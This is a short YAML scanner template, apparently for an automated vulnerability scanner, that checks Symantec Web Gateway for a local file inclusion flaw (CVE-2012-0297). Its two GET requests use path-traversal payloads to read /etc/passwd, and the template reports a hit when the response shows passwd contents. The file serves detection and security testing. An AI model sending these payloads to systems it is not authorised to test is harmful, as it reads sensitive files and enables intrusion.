id: symantec-web-gateway-lfi
info:
  name: Symantec Web Gateway - LFI (CVE-2012-0297)
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", "bin/bash")
  - method: GET
    redirect: false
    url: >-
      {{.root}}/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", "bin/bash")

references:
  - link: https://www.exploit-db.com/exploits/19406